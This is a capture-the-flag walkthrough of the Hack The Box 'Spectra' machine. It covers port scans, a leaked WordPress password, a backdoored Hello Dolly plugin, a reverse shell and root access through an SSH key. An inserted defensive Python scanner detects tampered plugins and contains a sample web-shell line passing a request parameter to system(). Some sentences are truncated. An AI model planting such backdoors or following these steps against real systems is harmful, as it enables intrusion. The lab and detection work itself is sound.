Spectra is a retired vulnerable VM from Hack The Box.
Let’s start with a masscan probe to establish the open ports on the host.
```
masscan -e tun0 -p1-65535 10.10.10.229 --rate=1000

Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-02-28 10:05:49 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 22/tcp on 10.10.10.229
Discovered open port 80/tcp on 10.10.10.229
Discovered open port 3306/tcp on 10.10.10.229
```
Hmm, nothing interesting. Let’s do one better with nmap, scanning the discovered ports to establish their services.
```
nmap -n -v -Pn -p22,80,3306,8081 -A --reason 10.10.10.229 -oN nmap.txt
...
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
|_  4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
80/tcp   open  http    syn-ack ttl 63 nginx 1.17.4
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.17.4
|_http-title: Site doesn't have a title (text/html).
3306/tcp open  mysql   syn-ack ttl 63 MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
```
This is what the http service looks like.
I’d better map these in /etc/hosts. This is how each of them looks.
If you navigate to /testing, you’ll notice that directory indexing is turned on.
One of the files contains the password for what seems like the WordPress database.
Maybe this is the administrator’s password to the working WordPress?
Once an attacker has administrator access to your WordPress installation, you are pretty much pwned. Here I’m creating another user with the Administrator role.
This plugin comes pre-installed in every WordPress installation and even though it’s pretty much a useless plugin, it’s extremely useful to us in getting that prized foothold to the remote machine.
You’ll notice that the Hello Dolly plugin is not activated, but that’s good because we can edit the plugin to include some backdoor PHP code and then activate the plugin.
There’s only one file in the Hello Dolly plugin and that’s hello.php. Let’s include our backdoor PHP code like so.
Update the file and then activate the plugin. Insert the 0 parameter in the address bar and you get instant remote command execution.
With that, we can run a reverse shell back to us with a Perl one-liner.
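A defender-side check for the plugin tampering described above, added here as an example that is not part of the original post: a small Python scanner that walks a WordPress plugins directory and flags PHP lines where a request superglobal is passed into a command- or code-execution function. The plugin files it scans are constructed samples, not the box's files.

```python
import re
import tempfile
from pathlib import Path

# PHP functions that hand a string to a shell or to the PHP interpreter.
EXEC_SINKS = ("system", "exec", "shell_exec", "passthru", "popen",
              "proc_open", "eval", "assert", "create_function")
# Superglobals populated from the HTTP request.
SUPERGLOBALS = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE", "$_SERVER")

# A sink whose argument list (up to the statement end) contains a request
# superglobal, e.g. system($_REQUEST[0]) or eval(base64_decode($_POST['x'])).
# Textual match, not taint analysis: sanitised uses are flagged for triage too.
SINK_RE = re.compile(r"\b(%s)\s*\([^;]*?(%s)\b" % (
    "|".join(EXEC_SINKS), "|".join(re.escape(s) for s in SUPERGLOBALS)))

def scan_php_source(source):
    """Return (line_number, stripped_line) for every line matching SINK_RE."""
    return [(no, line.strip())
            for no, line in enumerate(source.splitlines(), 1)
            if SINK_RE.search(line)]

def scan_plugin_dir(plugins_dir):
    """Scan every .php file below a plugins directory; {relative path: hits}."""
    findings = {}
    for php in sorted(Path(plugins_dir).rglob("*.php")):
        hits = scan_php_source(php.read_text(errors="replace"))
        if hits:
            findings[php.relative_to(plugins_dir).as_posix()] = hits
    return findings

# Constructed samples (not the real Hello Dolly source): a benign file and a
# copy with one appended line that hands a request parameter to system().
BENIGN_HELLO = """<?php
function hello_dolly_get_lyric() {
    $lyrics = "Hello, Dolly";
    return wptexturize( $lyrics );
}
add_action( 'admin_notices', 'hello_dolly' );
"""
TAMPERED_HELLO = BENIGN_HELLO + "if (isset($_REQUEST['c'])) { system($_REQUEST['c']); }\n"

def demo():
    """Build a throwaway plugins tree (one clean, one tampered plugin) and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        plugins = Path(tmp) / "wp-content" / "plugins"
        for name, body in (("hello-dolly/hello.php", TAMPERED_HELLO),
                           ("other-plugin/other.php", BENIGN_HELLO)):
            (plugins / name).parent.mkdir(parents=True)
            (plugins / name).write_text(body)
        return scan_plugin_dir(plugins)
```

Pointing scan_plugin_dir at a real wp-content/plugins directory gives a triage list; a hit in a plugin whose upstream release contains no such line is the signal that the file was modified in place.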
There you have it.
During enumeration of nginx’s account, I notice the presence of another account:
user.txt is in katie’s home directory.
Thank goodness for the “hint” left in /opt/autologin.conf.orig by the creator, otherwise I wouldn’t have found katie’s password in
From this, we also come to learn that this mysterious Other OS is the Chrome OS. Without further ado, I present to you
And here’s the
During enumeration of katie’s account, I notice that katie is able to sudo the following.
developers group, which katie is a member of, created a whole bunch of
test1.conf to insert an SSH public key I control into /root/.ssh/authorized_keys and call it a day.